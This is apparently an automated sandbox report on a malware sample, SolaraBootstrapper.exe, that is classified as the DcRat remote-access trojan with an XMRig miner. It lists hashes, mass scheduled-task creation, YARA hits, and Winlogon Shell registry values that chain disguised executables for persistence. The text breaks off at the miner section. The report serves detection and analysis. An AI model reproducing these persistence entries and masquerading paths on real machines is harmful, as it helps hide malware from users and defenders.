Analysis
-
max time kernel
47s -
max time network
601s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
21-07-2024 19:38
Behavioral task
behavioral1
Sample
SolaraBootstrapper.exe
Resource
win10v2004-20240709-en
General
-
Target
SolaraBootstrapper.exe
-
Size
9.5MB
-
MD5
7d9b8cef5925d1a700d720743bf61865
-
SHA1
10321760a98c0220be157441ae0516a5003ceba3
-
SHA256
1f3a8ed14dcf8dd8b4a88787b08163b9e9d65d999e61645b90c0c91b6a8f71fd
-
SHA512
793cf9f9641cd3c79fdba67af80d4ecf4b17ba4c151cc4696504740db64aaf309caeec1497273092a825e3543109f1172648193b9ae8a15d57b1501b74d2f8a9
-
SSDEEP
196608:ZE7JB0tYrXLW+d7UcIxptvyUQymRDSI1WCOK5d66w:ZE9B0OjrdLK4J/n66w
Malware Config
Signatures
-
DcRat 64 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeSolaraBootstrapper.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1408 schtasks.exe 688 schtasks.exe 4176 schtasks.exe 2756 schtasks.exe 3168 schtasks.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SolaraBootstrapper.exe 7060 schtasks.exe 2948 schtasks.exe 6252 schtasks.exe 6996 schtasks.exe 964 schtasks.exe 3336 schtasks.exe 1272 schtasks.exe 6560 schtasks.exe 2348 schtasks.exe 1728 schtasks.exe 2472 schtasks.exe 6116 schtasks.exe 5360 schtasks.exe 5848 schtasks.exe 2476 schtasks.exe 2384 schtasks.exe 6216 schtasks.exe 3116 schtasks.exe 5092 schtasks.exe 4468 schtasks.exe 5428 schtasks.exe 4892 schtasks.exe 4832 schtasks.exe 3516 schtasks.exe 116 schtasks.exe 4060 schtasks.exe 1508 schtasks.exe 4532 schtasks.exe 6636 schtasks.exe 2492 schtasks.exe 3444 schtasks.exe 1916 schtasks.exe 4940 schtasks.exe 6188 schtasks.exe 4468 schtasks.exe 4440 schtasks.exe 2944 schtasks.exe 2756 schtasks.exe 4188 schtasks.exe 4392 schtasks.exe 3208 schtasks.exe 2836 schtasks.exe 376 schtasks.exe 4828 schtasks.exe 2004 schtasks.exe 7112 schtasks.exe 3876 schtasks.exe 2472 schtasks.exe 544 schtasks.exe 3916 schtasks.exe 6232 schtasks.exe 2728 schtasks.exe 6576 schtasks.exe 4660 schtasks.exe 2420 schtasks.exe 4420 schtasks.exe 7012 schtasks.exe 4788 schtasks.exe -
Modifies WinLogon for persistence 2 TTPs 22 IoCs
Processes:
faildsfsdf.exeRefcrt.exeRoblox.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\xdwdSublime Text.exe" faildsfsdf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\", \"C:\\winNet\\Refcrt.exe\", \"C:\\Users\\All Users\\Documents\\conhost.exe\", \"C:\\DriversavessessionDlldhcp\\sysmon.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\", \"C:\\Users\\Admin\\AppData\\Local\\TrustedInstaller.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\", \"C:\\winNet\\Refcrt.exe\", \"C:\\Users\\All Users\\Documents\\conhost.exe\", \"C:\\DriversavessessionDlldhcp\\sysmon.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\", \"C:\\Users\\Admin\\AppData\\Local\\TrustedInstaller.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\", \"C:\\winNet\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\", \"C:\\winNet\\Refcrt.exe\", \"C:\\Users\\All Users\\Documents\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\", \"C:\\winNet\\Refcrt.exe\", \"C:\\Users\\All Users\\Documents\\conhost.exe\", \"C:\\DriversavessessionDlldhcp\\sysmon.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\", \"C:\\winNet\\Refcrt.exe\", \"C:\\Users\\All Users\\Documents\\conhost.exe\", \"C:\\DriversavessessionDlldhcp\\sysmon.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\"" Refcrt.exe -
Process spawned unexpected child process 63 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3116 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3444 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3208 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5092 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4832 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4188 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4788 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3776 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4420 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 544 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3040 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2756 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4160 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3864 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4940 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2556 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3204 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2012 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 60 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1520 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1032 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3168 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1688 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2836 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3252 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4240 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1272 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2156 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1552 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1408 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3400 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1728 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 324 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1916 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3720 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4704 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2420 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4060 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3116 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 552 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2492 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3208 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4364 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2476 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3516 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4440 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2404 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2944 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4468 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2004 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1924 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2756 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4660 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3536 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1776 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2264 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3336 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4924 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5124 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4468 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 544 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6112 2496 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6036 2496 schtasks.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Youtube.exe dcrat behavioral1/memory/5044-20-0x0000000000400000-0x0000000000D8F000-memory.dmp dcrat C:\Users\Admin\AppData\Local\Temp\Result.exe dcrat behavioral1/memory/5072-56-0x0000000000400000-0x0000000000CC7000-memory.dmp dcrat C:\Users\Admin\AppData\Local\Temp\solara.exe dcrat behavioral1/memory/5100-87-0x0000000000400000-0x000000000069B000-memory.dmp dcrat C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe dcrat behavioral1/memory/4084-108-0x00000000004B0000-0x0000000000634000-memory.dmp dcrat -
XMRig Miner payload 11 IoCs
Processes:
